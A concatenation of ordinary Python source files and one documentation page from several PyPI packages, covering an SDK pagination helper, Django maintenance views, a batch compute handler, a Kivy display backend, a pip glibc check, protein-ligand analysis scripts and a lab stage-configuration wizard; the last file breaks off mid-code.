# cursor - string - Used for pagination. When a list request has more records available, cursors are provided in the response headers `X-Files-Cursor-Next` and `X-Files-Cursor-Prev`. Send one of those cursor value here to resume an existing list from the next available record. Note: many of our SDKs have iterator methods that will automatically handle cursor-based pagination.
# per_page - int64 - Number of records to show per page. (Max: 10,000, 1,000 or less is recommended).
# sort_by - object - If set, sort records by the specified field in either `asc` or `desc` direction (e.g. `sort_by[created_at]=desc`). Valid fields are `created_at`.
# filter - object - If set, return records where the specified field is equal to the supplied value. Valid fields are `created_at`.
# filter_gt - object - If set, return records where the specified field is greater than the supplied value. Valid fields are `created_at`.
# filter_gteq - object - If set, return records where the specified field is greater than or equal the supplied value. Valid fields are `created_at`.
# filter_lt - object - If set, return records where the specified field is less than the supplied value. Valid fields are `created_at`.
# filter_lteq - object - If set, return records where the specified field is less than or equal the supplied value. Valid fields are `created_at`.
# inbox_registration_id - int64 - InboxRegistration ID
# inbox_id - int64 - Inbox ID
def list(params = None, options = None):
if not isinstance(params, dict):
params = {}
if not isinstance(options, dict):
options = {}
if "cursor" in params and not isinstance(params["cursor"], str):
raise InvalidParameterError("Bad parameter: cursor must be an str")
if "per_page" in params and not isinstance(params["per_page"], int):
raise InvalidParameterError("Bad parameter: per_page must be an int")
if "sort_by" in params and not isinstance(params["sort_by"], dict):
raise InvalidParameterError("Bad parameter: sort_by must be an dict")
if "filter" in params and not isinstance(params["filter"], dict):
raise InvalidParameterError("Bad parameter: filter must be an dict")
if "filter_gt" in params and not isinstance(params["filter_gt"], dict):
raise InvalidParameterError("Bad parameter: filter_gt must be an dict")
if "filter_gteq" in params and not isinstance(params["filter_gteq"], dict):
raise InvalidParameterError("Bad parameter: filter_gteq must be an dict")
if "filter_lt" in params and not isinstance(params["filter_lt"], dict):
raise InvalidParameterError("Bad parameter: filter_lt must be an dict")
if "filter_lteq" in params and not isinstance(params["filter_lteq"], dict):
raise InvalidParameterError("Bad parameter: filter_lteq must be an dict")
if "inbox_registration_id" in params and not isinstance(params["inbox_registration_id"], int):
raise InvalidParameterError("Bad parameter: inbox_registration_id must be an int")
if "inbox_id" in params and not isinstance(params["inbox_id"], int):
raise InvalidParameterError("Bad parameter: inbox_id must be an int")
return ListObj(InboxUpload,"GET", "/inbox_uploads", params, options)
def all(params = None, options = None):
list(params, options)
def new(*args, **kwargs):
return InboxUpload(*args, **kwargs) | PypiClean |
/NEMO_CE-1.6.12-py3-none-any.whl/NEMO/views/maintenance.py | from itertools import chain
from django.db.models import Q
from django.shortcuts import get_object_or_404, render
from django.views.decorators.http import require_GET
from NEMO.decorators import staff_member_required
from NEMO.models import Task, TaskCategory, TaskStatus, User
from NEMO.utilities import as_timezone
@staff_member_required
@require_GET
def maintenance(request, sort_by=''):
user: User = request.user
pending_tasks = Task.objects.filter(cancelled=False, resolved=False)
if user.get_preferences().tool_task_notifications.exists():
# Limit tools to preferences + tools user is the owner of + tools user is a backup owner of.
limit_tools = set(user.get_preferences().tool_task_notifications.all())
limit_tools.update(user.primary_tool_owner.all())
limit_tools.update(user.superuser_for_tools.all())
pending_tasks = pending_tasks.filter(tool__in=limit_tools)
if sort_by in ['urgency', 'force_shutdown', 'tool', 'problem_category', 'last_updated', 'creation_time']:
if sort_by == 'last_updated':
pending_tasks = pending_tasks.exclude(last_updated=None).order_by('-last_updated')
not_yet_updated_tasks = Task.objects.filter(cancelled=False, resolved=False, last_updated=None).order_by('-creation_time')
pending_tasks = list(chain(pending_tasks, not_yet_updated_tasks))
else:
pending_tasks = pending_tasks.order_by(sort_by)
if sort_by in ['urgency', 'force_shutdown', 'creation_time']:
pending_tasks = pending_tasks.reverse()
else:
pending_tasks = pending_tasks.order_by('urgency').reverse() # Order by urgency by default
closed_tasks = Task.objects.filter(Q(cancelled=True) | Q(resolved=True)).exclude(resolution_time__isnull=True).order_by('-resolution_time')[:20]
dictionary = {
'pending_tasks': pending_tasks,
'closed_tasks': closed_tasks,
}
return render(request, 'maintenance/maintenance.html', dictionary)
@staff_member_required
@require_GET
def task_details(request, task_id):
task = get_object_or_404(Task, id=task_id)
if task.cancelled or task.resolved:
return render(request, 'maintenance/closed_task_details.html', {'task': task})
dictionary = {
'task': task,
"estimated_resolution_time": as_timezone(task.estimated_resolution_time) if task.estimated_resolution_time else None,
'initial_assessment_categories': TaskCategory.objects.filter(stage=TaskCategory.Stage.INITIAL_ASSESSMENT),
'completion_categories': TaskCategory.objects.filter(stage=TaskCategory.Stage.COMPLETION),
'task_statuses': TaskStatus.objects.all(),
}
if task.tool.is_configurable():
dictionary['rendered_configuration_html'] = task.tool.configuration_widget(request.user)
return render(request, 'maintenance/pending_task_details.html', dictionary) | PypiClean |
/FicusFramework-3.1.0.post2.tar.gz/FicusFramework-3.1.0.post2/src/api/handler/ce/AbstractBatchCE.py | import threading
from abc import abstractmethod
from datetime import datetime
from queue import Queue
from concurrent.futures import ThreadPoolExecutor, as_completed
from api.handler.ICacheAbleHandler import ICacheAbleHandler
from api.handler.ITaskHandler import ITaskHandler
from api.handler.outputer.IBatchOutputer import IBatchOutputer
from api.model.BatchOutputPipe import BatchOutputPipe
from api.model.FdInputPipe import FdInputPipe
from api.model.ResultVO import *
from client import ComputeExecutionClient
from schedule.utils.log import TaskLogFileAppender
class AbstractBatchCE(ITaskHandler, IBatchOutputer, ICacheAbleHandler):
"""
自定义批量的CE实现
"""
# 由于这个的实现有可能是 单例的,所以要使用ThreadLocal
def __init__(self):
super().__init__()
self.__code_local_host = threading.local()
self.__process_id_local = threading.local()
self.__task_log_id_local = threading.local()
self.__execution_message_local = threading.local()
self.__tasks_local_host = threading.local()
self.killed = False
def __action(self, data_compute_execution, output_stream, params, is_finished, messages):
# 异步线程来对数据进行输入
from schedule import ShardContext
try:
self.set_local_code(
data_compute_execution.site + "_" + data_compute_execution.projectCode + "_" + data_compute_execution.code)
self.set_process_id(params.get("__processLogId__"))
self.__task_log_id_local.key = params.get("__logId__")
self.__execution_message_local.content = []
self.set_site_and_project(data_compute_execution.site, data_compute_execution.projectCode)
TaskLogFileAppender.prepare_to_log(datetime.strptime(params["__triggerTime__"], "%Y-%m-%d %H:%M:%S"),params["__logId__"])
if "__sharding_index__" in params and "__sharding_total__" in params:
from schedule.ShardContext import Sharding
ShardContext.set_sharding(Sharding(params["__sharding_index__"], params["__sharding_total__"]))
self.do_compute(BatchOutputPipe(output_stream, len(data_compute_execution.outputFdCodes)),
FdInputPipe(data_compute_execution.site, data_compute_execution.projectCode, data_compute_execution.sourceFdCodes), params)
finally:
# 清理 MessageLocal 和 LocalCode
is_finished[0] = True
messages[0] = "success" if self.__execution_message_local.content is None or len(
self.__execution_message_local.content) == 0 else str(self.__execution_message_local.content)
self.clear_local_code()
self.clear_process_id()
self.clear_site_and_project()
self.__task_log_id_local.key = None
self.__execution_message_local.content = None
ShardContext.reset()
TaskLogFileAppender.end_log()
def execute(self, params):
if params is None or len(params) == 0 or ("site_" not in params) or ("projectCode_" not in params) or (
"code_" not in params):
# 不存在crawl的信息,没法执行
return ResultVO(FAIL_CODE, "执行失败,没有ce的信息")
self.__tasks_local_host.tasks = []
output_stream = Queue()
self.killed = False
with ThreadPoolExecutor(max_workers=2,thread_name_prefix="batch-ce-") as executor:
# 这个的逻辑是这样的:
# 1.传入一个 队列进去,然后异步等待这个线程做完
try:
data_compute_execution = ComputeExecutionClient.get(params["site_"], params["projectCode_"],
params["code_"])
if data_compute_execution is None:
return ResultVO(FAIL_CODE, f"执行失败,没有找到Code:{params['code_']}的ce")
is_finished = [False]
messages = [None]
self.__tasks_local_host.tasks.append(executor.submit(self.__action,data_compute_execution,output_stream,params,is_finished,messages))
# 增加发送结果的线程
self.__tasks_local_host.tasks.append(
executor.submit(self.batch_output, params["site_"], params["projectCode_"], params["code_"], data_compute_execution.outputFdCodes, is_finished, output_stream,params))
# 阻塞主线程
for future in as_completed(self.__tasks_local_host.tasks):
try:
data = future.result()
except Exception as e:
import traceback
return ResultVO(FAIL_CODE, f"执行失败,Code:{params['code_']}的CE,原因:\n{traceback.format_exc()}")
if messages[0] is not None:
return ResultVO(SUCCESS_CODE, messages[0])
return SUCCESS
finally:
self.__tasks_local_host.tasks.clear()
executor.shutdown(wait=True)
output_stream.queue.clear()
def kill(self):
self.killed = True
if self.__tasks_local_host.tasks is not None:
for task in self.__tasks_local_host.tasks:
try:
task._stop()
except:
pass
def is_killed(self):
return self.killed
def get_execution_message_cache(self):
"""
返回message_cache
:return:
"""
return self.__execution_message_local.content
def get_batch_size(self) -> int:
# TODO 先写死100
return 100
def get_code_thread_local(self):
"""
实现上下文的code
:return:
"""
return self.__code_local_host
def get_process_thread_local(self):
"""
上下文的Id
:return:
"""
return self.__process_id_local
def get_task_log_id(self):
return self.__task_log_id_local.key
@abstractmethod
def do_compute(self, output_stream: BatchOutputPipe, source_fds: FdInputPipe, params: dict):
"""
真正执行数据挖掘的逻辑
:param output_stream: 数据的输出
:param source_fds: ce的输入
:param params: 需要的参数
:return:
""" | PypiClean |
/Kivy-2.2.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl/kivy/core/window/window_egl_rpi.py | __all__ = ('WindowEglRpi', )
from kivy.logger import Logger
from kivy.core.window import WindowBase
from kivy.base import EventLoop, ExceptionManager, stopTouchApp
from kivy.lib.vidcore_lite import bcm, egl
from os import environ
# Default display IDs.
(DISPMANX_ID_MAIN_LCD,
DISPMANX_ID_AUX_LCD,
DISPMANX_ID_HDMI,
DISPMANX_ID_SDTV,
DISPMANX_ID_FORCE_LCD,
DISPMANX_ID_FORCE_TV,
DISPMANX_ID_FORCE_OTHER) = range(7)
class WindowEglRpi(WindowBase):
_rpi_dispmanx_id = int(environ.get("KIVY_BCM_DISPMANX_ID", "0"))
_rpi_dispmanx_layer = int(environ.get("KIVY_BCM_DISPMANX_LAYER", "0"))
gl_backends_ignored = ['sdl2']
def create_window(self):
bcm.host_init()
w, h = bcm.graphics_get_display_size(self._rpi_dispmanx_id)
Logger.debug('Window: Actual display size: {}x{}'.format(
w, h))
self._size = w, h
self._create_window(w, h)
self._create_egl_context(self.win, 0)
super(WindowEglRpi, self).create_window()
def _create_window(self, w, h):
dst = bcm.Rect(0, 0, w, h)
src = bcm.Rect(0, 0, w << 16, h << 16)
display = egl.bcm_display_open(self._rpi_dispmanx_id)
update = egl.bcm_update_start(0)
element = egl.bcm_element_add(
update, display, self._rpi_dispmanx_layer, dst, src)
self.win = egl.NativeWindow(element, w, h)
egl.bcm_update_submit_sync(update)
def _create_egl_context(self, win, flags):
api = egl._constants.EGL_OPENGL_ES_API
c = egl._constants
attribs = [
c.EGL_RED_SIZE, 8,
c.EGL_GREEN_SIZE, 8,
c.EGL_BLUE_SIZE, 8,
c.EGL_ALPHA_SIZE, 8,
c.EGL_DEPTH_SIZE, 16,
c.EGL_STENCIL_SIZE, 8,
c.EGL_SURFACE_TYPE, c.EGL_WINDOW_BIT,
c.EGL_NONE]
attribs_context = [c.EGL_CONTEXT_CLIENT_VERSION, 2, c.EGL_NONE]
display = egl.GetDisplay(c.EGL_DEFAULT_DISPLAY)
egl.Initialise(display)
egl.BindAPI(c.EGL_OPENGL_ES_API)
egl.GetConfigs(display)
config = egl.ChooseConfig(display, attribs, 1)[0]
surface = egl.CreateWindowSurface(display, config, win)
context = egl.CreateContext(display, config, None, attribs_context)
egl.MakeCurrent(display, surface, surface, context)
self.egl_info = (display, surface, context)
egl.MakeCurrent(display, surface, surface, context)
def close(self):
egl.Terminate(self.egl_info[0])
def flip(self):
if not EventLoop.quit:
egl.SwapBuffers(self.egl_info[0], self.egl_info[1]) | PypiClean |
/Electrum-CHI-3.3.8.tar.gz/Electrum-CHI-3.3.8/packages/pip/_internal/utils/glibc.py | from __future__ import absolute_import
import ctypes
import re
import warnings
from pip._internal.utils.typing import MYPY_CHECK_RUNNING
if MYPY_CHECK_RUNNING:
from typing import Optional, Tuple
def glibc_version_string():
# type: () -> Optional[str]
"Returns glibc version string, or None if not using glibc."
# ctypes.CDLL(None) internally calls dlopen(NULL), and as the dlopen
# manpage says, "If filename is NULL, then the returned handle is for the
# main program". This way we can let the linker do the work to figure out
# which libc our process is actually using.
process_namespace = ctypes.CDLL(None)
try:
gnu_get_libc_version = process_namespace.gnu_get_libc_version
except AttributeError:
# Symbol doesn't exist -> therefore, we are not linked to
# glibc.
return None
# Call gnu_get_libc_version, which returns a string like "2.5"
gnu_get_libc_version.restype = ctypes.c_char_p
version_str = gnu_get_libc_version()
# py2 / py3 compatibility:
if not isinstance(version_str, str):
version_str = version_str.decode("ascii")
return version_str
# Separated out from have_compatible_glibc for easier unit testing
def check_glibc_version(version_str, required_major, minimum_minor):
# type: (str, int, int) -> bool
# Parse string and check against requested version.
#
# We use a regexp instead of str.split because we want to discard any
# random junk that might come after the minor version -- this might happen
# in patched/forked versions of glibc (e.g. Linaro's version of glibc
# uses version strings like "2.20-2014.11"). See gh-3588.
m = re.match(r"(?P<major>[0-9]+)\.(?P<minor>[0-9]+)", version_str)
if not m:
warnings.warn("Expected glibc version with 2 components major.minor,"
" got: %s" % version_str, RuntimeWarning)
return False
return (int(m.group("major")) == required_major and
int(m.group("minor")) >= minimum_minor)
def have_compatible_glibc(required_major, minimum_minor):
# type: (int, int) -> bool
version_str = glibc_version_string() # type: Optional[str]
if version_str is None:
return False
return check_glibc_version(version_str, required_major, minimum_minor)
# platform.libc_ver regularly returns completely nonsensical glibc
# versions. E.g. on my computer, platform says:
#
# ~$ python2.7 -c 'import platform; print(platform.libc_ver())'
# ('glibc', '2.7')
# ~$ python3.5 -c 'import platform; print(platform.libc_ver())'
# ('glibc', '2.9')
#
# But the truth is:
#
# ~$ ldd --version
# ldd (Debian GLIBC 2.22-11) 2.22
#
# This is unfortunate, because it means that the linehaul data on libc
# versions that was generated by pip 8.1.2 and earlier is useless and
# misleading. Solution: instead of using platform, use our code that actually
# works.
def libc_ver():
# type: () -> Tuple[str, str]
"""Try to determine the glibc version
Returns a tuple of strings (lib, version) which default to empty strings
in case the lookup fails.
"""
glibc_version = glibc_version_string()
if glibc_version is None:
return ("", "")
else:
return ("glibc", glibc_version) | PypiClean |
/Divisi-0.6.10.tar.gz/Divisi-0.6.10/csc/divisi/recycling_set.py | from ordered_set import OrderedSet
from priodict import priorityDictionary
class RecyclingSet(OrderedSet):
__slots__ = ['items', 'indices', 'index', 'indexFor', '__contains__',
'__getitem__', '__len__', 'count', 'maxsize',
'drop_listeners', 'priority']
def __init__(self, maxsize, origitems=None):
self.count = 0
self.maxsize = maxsize
self.priority = priorityDictionary()
self.drop_listeners = []
OrderedSet.__init__(self, origitems)
def __getstate__(self):
return (self.items, self.priority, self.maxsize, self.count)
def __setstate__(self, state):
items, self.priority, self.maxsize, self.count = state
OrderedSet.__setstate__(self, items)
def add(self, key):
"""
Add an item to the set (unless it's already there),
returning its index. Drop an old item if necessary.
``None`` is never an element of an OrderedSet.
"""
if key in self.indices:
self.touch(key)
return self.indices[key]
n = len(self.items)
if n < self.maxsize:
self.items.append(key)
if key is not None:
self.indices[key] = n
self.touch(key)
return n
else:
newindex = self.drop_oldest()
self.items[newindex] = key
self.indices[key] = newindex
self.touch(key)
return newindex
append = add
def __delitem__(self, n):
"""
Deletes an item from the RecyclingSet.
"""
oldkey = self.items[n]
del self.indices[oldkey]
self.items[n] = None
self.announce_drop(n, oldkey)
def drop_oldest(self):
"""
Drop the least recently used item, to make room for a new one. Return
the number of the slot that just became free.
"""
slot = self.priority.smallest()
oldest = self.items[slot]
del self[slot]
return slot
def listen_for_drops(self, callback):
"""
If an object needs to know when a slot becomes invalid because its
key gets dropped, it should register a callback with listen_for_drops.
"""
self.drop_listeners.append(callback)
def announce_drop(self, index, key):
"""
Tell all registered listeners that we dropped a key.
"""
for listener in self.drop_listeners:
listener(index, key)
def touch(self, key):
"""
Remember that this key is useful.
"""
if key not in self: raise IndexError
else:
self.count += 1
self.priority[self.index(key, False)] = self.count
def index(self, key, touch=True):
if touch: self.touch(key)
return self.indices[key]
indexFor = index
def __contains__(self, key):
return key in self.indices
def __getitem__(self, key):
if key < self.maxsize and key >= len(self.items):
return None
return self.items[key]
def __len__(self):
return len(self.indices)
def _setup_quick_lookup_methods(self):
pass | PypiClean |
/Hyperion-0.9.10.tar.gz/Hyperion-0.9.10/docs/dust/kmh_hg.rst | Kim, Martin, and Hendry (1994) dust with Henyey-Greenstein scattering
=====================================================================
These are dust properties from `Kim, Martin, and Hendry (1994)`_, also known as
KMH. The dust consists of astronomical silicates, graphite, and carbon and the
size distribution was determined using a maximum entropy method. This dust type
is meant to be applicable to the diffuse ISM (for low column densities) in the
Galaxy.
.. note:: The dust properties given here are given per unit mass of
**gas+dust**, assuming a gas-to-dust ratio of 141.84. This means that
when using Hyperion, the total gas+dust densities should be specified.
This version of the dust file is take directly from `HOCHUNK`_, the radiative
transfer code developed by B. Whitney et al. This is the dust you should use if
you want to reproduce results from that code, and it approximates the
scattering with a Henyey-Greenstein function. However, if you are interested in
the best version of the KMH dust, with full scattering properties, you can find
this under :doc:`kmh`.
The dust file is available in the ``hyperion-dust`` directory as
``dust_files/kmh94_3.1_hg.hdf5`` (once you have run
``python setup.py build_dust``).
Rv=3.1 (``dust_files/kmh94_3.1_hg.hdf5``)
-------------------------------------------
The following plot gives an overview of the dust properties (as described in
:doc:`../setup/setup_dust`):
.. image:: kmh94_3.1_hg.png
:width: 800px
:align: center
.. _Kim, Martin, and Hendry (1994): http://dx.doi.org/10.1086/173714
.. _HOCHUNK: http://gemelli.colorado.edu/~bwhitney/codes/codes.html | PypiClean |
/FragPELE-2.1.1.tar.gz/FragPELE-2.1.1/frag_pele/Analysis/sidecahins_analyser.py | import sys
import os
import numpy as np
import prody
import argparse
# Local import
from rmsd_computer import superimpose_backbones
from interaction_detector import pdb2prody
from interaction_detector import select_atom_given_name_type_and_num
def parse_arguments():
"""
Parse user arguments
Output: list with all the user arguments
"""
# All the docstrings are very provisional and some of them are old, they would be changed in further steps!!
parser = argparse.ArgumentParser(description="""""")
required_named = parser.add_argument_group('required named arguments')
# Growing related arguments
required_named.add_argument("-t", "--type", required=True, choices=['sidechains', 'atom_distances'],
help="""Computation type that you want to do. Choose between: sidechains,
atom_distances. """)
required_named.add_argument("-pdbt", "--pdb_target", required=True,
help="""Target pdb file. """)
parser.add_argument("-pdbr", "--pdb_reference",
help="""Reference pdb file.""")
parser.add_argument("-a", "--area", default=False,
help=""""The area (volume) that will be used to select which amino acids are close to the
ligand. THE USAGE OF THIS FLAG HAS NOT BEEN DEBUG SO IS NOT RECOMMENDED TO ACTIVATE IT.""")
parser.add_argument("-ch", "--chain", default="L",
help="Name of the ligand's chain")
parser.add_argument("-o", "--out", default="report_rmsd.txt",
help="Output file name.")
parser.add_argument("-rf", "--res_file", default=False,
help="""Filename that contains which amino acids do you want to select to do the rmsd
computations.""")
args = parser.parse_args()
return args.type, args.pdb_reference, args.pdb_target, args.area, args.out, args.chain, args.res_file
def read_selecteds_from_file(filepath):
residues_id_list = []
with open(filepath, "r") as in_file:
for aminoacid in in_file.readlines():
residues_id_list.append(aminoacid)
return [a.strip("\n") for a in residues_id_list]
def sidechains_rmsd_calculator(pdb_target, pdb_reference, res_file=False, area=False, write2report=False, ligand_chain="L"):
"""
:param pdb_target: problem pdb file
:param pdb_reference: reference pdb file
:param radii: area that we want to select around the ligand
:param path: output path
:param write2report: if true extract a report file
:param ligand_chain: name of the chain of the ligand
:return: superpose the backbone of the pdb_target to the pdb_reference and computes the RMSD for each side
chain in the selection area
"""
target, reference = superimpose_backbones(pdb_target, pdb_reference)
if area:
print("Selection set of {} Amstrongs".format(area))
selected_area_target = reference.select("protein and (within {} of chain {})".format(area, ligand_chain))
unique_residues_target = sorted(set(selected_area_target.getResnums()))
elif res_file:
aminoacids_list = read_selecteds_from_file(res_file)
print("Searching the following amino acids: {}".format(aminoacids_list))
selected_area_target = reference.select("resnum {}".format(' '.join(aminoacids_list)))
unique_residues_target = sorted(set(selected_area_target.getResnums()))
else:
print("Please, set an input file or a radii to determine which amino acids will be used to compute the RMSD.")
list_of_results = []
for residue_target in unique_residues_target:
res_selected_target = target.select("protein and resnum {} and heavy".format(residue_target))
res_selected_reference = reference.select("protein and resnum {} and heavy".format(residue_target))
target_CA = target.select("protein and resnum {} and name CA".format(residue_target))
reference_CA = reference.select("protein and resnum {} and name CA".format(residue_target))
try:
RMSD = prody.calcRMSD(res_selected_reference, res_selected_target)
distance_bet_CA = prody.calcRMSD(reference_CA, target_CA)
except:
print("ERROR because different number of atoms in residue {}".format(residue_target))
print("ATOMS of the TARGET: {}".format(res_selected_target.getNames()))
print("ATOMS of the REFERENCE: {}".format(res_selected_reference.getNames()))
residue_information = (residue_target, res_selected_target.getResnames()[0], RMSD, distance_bet_CA)
list_of_results.append(residue_information)
print(residue_information)
if write2report:
filename = write2report
with open(filename, "w") as report:
for result in list_of_results:
report.write("{:4d}\t{}\t{:5.3f}\t{:5.3f}\t{:5.3f}\n".format(result[0], result[1], float(result[2]),
float(result[3]), (float(result[2]) - float(result[3]))))
def compute_atom_distances(pdb_target, res_file, output_report, chain="L"):
"""
This function calculate atom-atom distances for ligand and residue atoms. The residue number and atom names
(for both, ligand and residue) must be specified in a file ('res_file').
:param pdb_target: input PDB file path
:param res_file: file with instructions. This file must have n rows with three format: RESNUM LATOMNAME/SLIGAND
ATOMNAMES/SRESIDUE. If you want to calculate a distance using a center of mass write [ATOM1,ATOM2,ATOMN]
:param output_report:
:param chain:
:return:
"""
# Load PDB files
target = pdb2prody(pdb_target)
ligand = target.select("chain {}".format(chain))
print(ligand.getNames())
# Reading instructions from file
list_of_instructions = read_selecteds_from_file(res_file)
# Select the input atoms
report = []
for line in list_of_instructions:
resnum, atom_name_ref, atom_name_tar = line.split()
# If the user wants to select more than one atom he has to put them in a string with this format: [atom1,atomN...]
if "[" in atom_name_ref or "]" in atom_name_ref:
print("Multiple atom selection for the ligand")
atom_string_with_comas = atom_name_ref.strip("[").strip("]")
atom_list = atom_string_with_comas.split(",")
atom_string = ' '.join(atom_list)
atom_ref_selected = ligand.select("name {}".format(atom_string))
print("Selected atoms: {}".format(atom_ref_selected.getNames()))
else:
print("Single atom selection for the ligand")
atom_ref_selected = ligand.select("name {}".format(atom_name_ref))
print("Selected atom: {}".format(atom_ref_selected.getNames()))
if "[" in atom_name_tar or "]" in atom_name_tar:
print("Multiple atom selection for the system")
atom_string_with_comas = atom_name_tar.strip("[").strip("]")
atom_list = atom_string_with_comas.split(",")
atom_string = ' '.join(atom_list)
atom_tar_selected = select_atom_given_name_type_and_num(target, resnum, atom_string)
print("Selected atoms: {}".format(atom_tar_selected.getNames()))
else:
print("Single atom selection for the system")
atom_tar_selected = select_atom_given_name_type_and_num(target, resnum, atom_name_tar)
print("Selected atom: {}".format(atom_tar_selected.getNames()))
try:
number_of_selected_atoms_ref = len(atom_ref_selected.getNames())
except AttributeError:
exit("None atoms where selected. Please, check if the selected atoms exists in the ligand in {}".format(pdb_target))
try:
number_of_selected_atoms_tar = len(atom_tar_selected.getNames())
except AttributeError:
exit("None atoms where selected. Please, check if the selected atoms exists in the residue {} in {}".format(resnum, pdb_target))
# Now there are four possibilities: len 1 in target and ref, len > 1 in one of both and len >1 in both.
# If the len is more than 1 we will use the center of mass as a point to compute the distance.
if number_of_selected_atoms_ref <= 1 and number_of_selected_atoms_tar <= 1:
distance = prody.calcDistance(atom_tar_selected, atom_ref_selected)
elif number_of_selected_atoms_ref <= 1 and number_of_selected_atoms_tar > 1:
center_tar = prody.calcCenter(atom_tar_selected)
atom_coords = atom_ref_selected.getCoords()[0]
distance = np.linalg.norm(center_tar - atom_coords)
elif number_of_selected_atoms_ref > 1 and number_of_selected_atoms_tar <= 1:
center_ref = prody.calcCenter(atom_ref_selected)
atom_coords = atom_tar_selected.getCoords()[0]
distance = np.linalg.norm(atom_coords - center_ref)
else:
center_tar = prody.calcCenter(atom_tar_selected)
center_ref = prody.calcCenter(atom_ref_selected)
distance = np.linalg.norm(center_tar-center_ref)
report_line = "{:4} {:10} {:10} {:6.3f}\n".format(resnum, ''.join(atom_ref_selected.getNames()),
''.join(atom_tar_selected.getNames()), distance)
report.append(report_line)
report_final = ''.join(report)
if output_report:
with open(output_report, "w") as report_file:
report_file.write(report_final)
print(report_final)
return report_final
if __name__ == '__main__':
type, pdb_reference, pdb_target, area, write2report, chain, res_file = parse_arguments()
if type == "sidechains":
sidechains_rmsd_calculator(pdb_target, pdb_reference, res_file, area, write2report, chain)
if type == "atom_distances":
compute_atom_distances(pdb_target, res_file, write2report, chain) | PypiClean |
/LabExT_pkg-2.2.0.tar.gz/LabExT_pkg-2.2.0/LabExT/View/Movement/MovementWizard.py | from logging import getLogger
from functools import partial
from itertools import product
from tkinter import W, Label, Button, messagebox, StringVar, OptionMenu, Frame, Button, Label, DoubleVar, Entry, BooleanVar, Checkbutton, DISABLED, NORMAL, LEFT, RIGHT, TOP, X
from typing import Type, List
from bidict import bidict
from LabExT.Movement.PathPlanning import SingleModeFiber, StagePolygon
from LabExT.Utils import run_with_wait_window, try_to_lift_window
from LabExT.View.Movement.CoordinatePairingsWindow import CoordinatePairingsWindow
from LabExT.View.Controls.CustomFrame import CustomFrame
from LabExT.View.Controls.CustomTable import CustomTable
from LabExT.View.Controls.Wizard import Step, Wizard
from LabExT.View.Controls.ParameterTable import ParameterTable
from LabExT.Measurements.MeasAPI.Measparam import MeasParamAuto
from LabExT.Movement.config import Orientation, DevicePort, Axis, Direction
from LabExT.Movement.Stage import Stage, StageError
from LabExT.Movement.MoverNew import MoverError, MoverNew, Stage
from LabExT.Movement.Transformations import CoordinatePairing
from LabExT.Movement.Calibration import Calibration
from LabExT.Wafer.Chip import Chip
class StageWizard(Wizard):
"""
Wizard to load stage drivers and connect to stages.
"""
def __init__(self, master, mover, experiment_manager=None):
"""
Constructor for new Stage Wizard.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
experiment_manager : ExperimentManager = None
Optional instance of the current experiment manager
"""
super().__init__(
master,
width=1100,
height=800,
on_finish=self.finish,
next_button_label="Next Step",
previous_button_label="Previous Step",
cancel_button_label="Cancel",
finish_button_label="Finish Setup",
)
self.title("Configure Mover")
self.mover: Type[MoverNew] = mover
self.experiment_manager = experiment_manager
self.load_driver_step = StageDriverStep(self, self.mover)
self.stage_assignment_step = StageAssignmentStep(self, self.mover)
self.load_driver_step.next_step = self.stage_assignment_step
self.stage_assignment_step.previous_step = self.load_driver_step
self.current_step = self.load_driver_step
def finish(self) -> bool:
"""
Creates calibrations and connect to stages.
"""
if self.mover.has_connected_stages:
if messagebox.askokcancel(
"Proceed?",
"You have already created stages. If you continue, they will be reset, including the calibrations. Proceed?",
parent=self):
self.mover.reset_calibrations()
else:
return False
self.stage_assignment_step.update_polygon_cfg()
for stage, assignment in self.stage_assignment_step.assignment.items():
orientation, port = assignment
polygon_cls, polygon_cls_cfg = self.stage_assignment_step.polygon_cfg.get(stage, (
self.stage_assignment_step.DEFAULT_POLYGON,
self.stage_assignment_step.DEFAULT_POLYGON.get_default_parameters()))
stage_polygon = polygon_cls(
orientation, parameters=polygon_cls_cfg)
try:
run_with_wait_window(
self,
f"Connecting to stage {stage}",
lambda: self.mover.add_stage_calibration(
stage=stage,
orientation=orientation,
port=port,
stage_polygon=stage_polygon))
except (ValueError, MoverError, StageError) as e:
self.mover.reset_calibrations()
messagebox.showerror(
"Error",
f"Connecting to stages failed: {e}",
parent=self)
return False
if not self.experiment_manager:
messagebox.showinfo(
"Stage Setup completed.",
f"Successfully connected to {len(self.stage_assignment_step.assignment)} stage(s).",
parent=self)
else:
if messagebox.askyesnocancel(
"Stage Setup completed.",
f"Successfully connected to {len(self.stage_assignment_step.assignment)} stage(s)."
"Do you want to calibrate the stages now?",
parent=self):
self.destroy()
self.experiment_manager.main_window.open_stage_calibration()
return True
class MoverWizard(Wizard):
"""
Wizard to configure the mover
"""
def __init__(self, master, mover):
"""
Constructor for new Mover Wizard.
Parameters
----------
master : Tk
Tk instance of the master toplevel
mover : Mover
Instance of the current mover.
"""
self.mover: Type[MoverNew] = mover
if not self.mover.has_connected_stages:
raise RuntimeError("No connected stages. Cannot configure mover.")
super().__init__(
master,
width=1100,
height=800,
on_finish=self.finish,
next_button_label="Next Step",
previous_button_label="Previous Step",
cancel_button_label="Cancel",
finish_button_label="Save",
with_sidebar=False
)
self.title("Configure Mover")
self.configure_mover_step = ConfigureMoverStep(self, self.mover)
self.current_step = self.configure_mover_step
def finish(self):
speed_xy = self._get_safe_value(
self.configure_mover_step.xy_speed_var,
float,
self.mover.DEFAULT_SPEED_XY)
speed_z = self._get_safe_value(
self.configure_mover_step.z_speed_var,
float,
self.mover.DEFAULT_SPEED_Z)
acceleration_xy = self._get_safe_value(
self.configure_mover_step.xy_acceleration_var,
float,
self.mover.DEFAULT_ACCELERATION_XY)
z_lift = self._get_safe_value(
self.configure_mover_step.z_lift_var,
float,
self.mover.DEFAULT_Z_LIFT)
if self._warn_user_about_zero_speed(
speed_xy) and self._warn_user_about_zero_speed(speed_z):
try:
self.mover.speed_xy = speed_xy
self.mover.speed_z = speed_z
self.mover.acceleration_xy = acceleration_xy
self.mover.z_lift = z_lift
self.mover.dump_settings()
messagebox.showinfo(
"Mover Setup completed.",
f"Successfully configured mover.",
parent=self)
return True
except Exception as e:
messagebox.showerror(
message=f"Could not setup stages. Reason: {e}",
parent=self)
return False
def _warn_user_about_zero_speed(self, speed) -> bool:
"""
Warns user when settings speed to zero.
Returns True if speed is not zero or user wants to set speed to zero.
"""
if speed == 0.0:
return messagebox.askokcancel(
message="Setting speed to 0 will turn the speed control OFF! \n"
"The stage will now move as fast as possible. Set a different speed if "
